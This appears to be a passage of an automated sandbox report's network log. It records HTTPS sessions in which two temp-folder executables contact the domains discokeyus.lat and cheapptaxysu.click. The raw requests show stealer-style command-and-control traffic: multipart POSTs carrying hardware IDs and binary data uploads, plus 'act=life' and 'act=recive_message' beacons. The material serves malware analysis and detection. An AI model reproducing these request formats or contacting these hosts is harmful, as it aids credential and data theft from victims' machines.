                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:48 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            45192.168.2.449902104.21.21.99443280C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:48 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=C62IQW5YAMPCS8AHUCU
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20443
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:48 UTC15331OUTData Raw: 2d 2d 43 36 32 49 51 57 35 59 41 4d 50 43 53 38 41 48 55 43 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 36 32 49 51 57 35 59 41 4d 50 43 53 38 41 48 55 43 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 36 32 49 51 57 35 59 41 4d 50 43 53 38 41 48 55 43 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                                                                                                                                            Data Ascii: --C62IQW5YAMPCS8AHUCUContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--C62IQW5YAMPCS8AHUCUContent-Disposition: form-data; name="pid"3--C62IQW5YAMPCS8AHUCUContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                                                                                                                                            2024-12-21 21:17:48 UTC5112OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                                                                                                                                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`
                                                                                                                                                                                                                                                            2024-12-21 21:17:49 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:49 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=fmuv3gr3thb7r0qr8m375s8ibm; expires=Wed, 16 Apr 2025 15:04:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0L0Rn7ILjoXTFDP%2FP7AerdvZIXU3ZA2bUpHm2BiIITqD2Pen1ikczedc%2Bq6c8olS9CdYr8ih4iuDk%2Fg7azvLyZXeiMFE%2Bs2ql%2FopV7TmlzpYMUpvpga4BphemSJlZaf5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae6ac8b0a0fa5-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1523&min_rtt=1509&rtt_var=595&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21404&delivery_rate=1795817&cwnd=190&unsent_bytes=0&cid=be81030b47ac5256&ts=945&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            46192.168.2.449911104.21.21.99443944C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:55 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4F7FYS2O
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1346
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:55 UTC1346OUTData Raw: 2d 2d 34 46 37 46 59 53 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 46 37 46 59 53 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 46 37 46 59 53 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 46 37 46 59 53 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                            Data Ascii: --4F7FYS2OContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--4F7FYS2OContent-Disposition: form-data; name="pid"1--4F7FYS2OContent-Disposition: form-data; name="lid"PsFKDg--pablo--4F7FYS2OContent-Disposit
                                                                                                                                                                                                                                                            2024-12-21 21:17:55 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:55 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=esh3d50tsmt1a8g57srcahhjuf; expires=Wed, 16 Apr 2025 15:04:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hXYiZksA9irDd%2B9BzYq4giZgb3jLwJUCes0IhTSSEjkbdJ87kIxKDHtrrtt1BljM%2FbEuimWorH%2BfsYkOxTDS%2BGHPt6I49%2FIqSjCCvsk%2FJ%2FBkCIumkV1RjK%2FfDFLbESlp5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae6d3df398c17-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2102&min_rtt=2066&rtt_var=801&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2251&delivery_rate=1413359&cwnd=240&unsent_bytes=0&cid=26a54d87ae696eb5&ts=794&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:17:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            47192.168.2.449915104.21.67.146443692C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:57 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: cheapptaxysu.click
                                                                                                                                                                                                                                                            2024-12-21 21:17:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2024-12-21 21:17:58 UTC560INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:57 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FCfV9rnjbEd7qFTS288iPOvKMgyKp3pyKebD6q83PvmxPalkB7PyU8HjK8u9cu2x%2BkuVA7%2FwnJHvUEd7WFUiQBah4OrMj7%2Bdrf8dhZ6oYFNpSkUeUlz55i12AdqlGSaRZgaLatQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae6e3f9ee4245-EWR
                                                                                                                                                                                                                                                            2024-12-21 21:17:58 UTC809INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                                                            Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                                                                            2024-12-21 21:17:58 UTC1369INData Raw: 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42
                                                                                                                                                                                                                                                            Data Ascii: i/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementB
                                                                                                                                                                                                                                                            2024-12-21 21:17:58 UTC1369INData Raw: 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form ac
                                                                                                                                                                                                                                                            2024-12-21 21:17:58 UTC1009INData Raw: 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72
                                                                                                                                                                                                                                                            Data Ascii: ass="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Per
                                                                                                                                                                                                                                                            2024-12-21 21:17:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            48192.168.2.449922104.21.21.99443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:59 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:59 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2024-12-21 21:18:00 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=sdf4rguvbat93ir2mssptrg2bm; expires=Wed, 16 Apr 2025 15:04:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6sfsBXNpyx9TAf%2Bg0Y8sY%2FbpfXAiCs5ODJ9z68GvN2ZnNGiThz%2FkbMVDU52qULUS61T28bwMc2G%2Bi%2BMuNL%2FBnFY5FKfgCOry0IVjYtQAlBcwD%2BTdLmuLVrE8O6ODMn94Sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae6f33b4342b2-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1779&min_rtt=1669&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1749550&cwnd=236&unsent_bytes=0&cid=df7265b9cd8b3e3a&ts=754&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:18:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2024-12-21 21:18:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            49192.168.2.449927104.21.67.146443692C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:00 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=UK5f.kGqs4s6b_2zbAsIvGYwo4.3VSBZmtv09cMrxTk-1734815877-0.0.1.1-/api
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 50
                                                                                                                                                                                                                                                            Host: cheapptaxysu.click
                                                                                                                                                                                                                                                            2024-12-21 21:18:00 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 26 6a 3d
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--geopoxid&j=
                                                                                                                                                                                                                                                            2024-12-21 21:18:01 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:01 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=h9js6102247ra3618g8p0nnpnd; expires=Wed, 16 Apr 2025 15:04:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
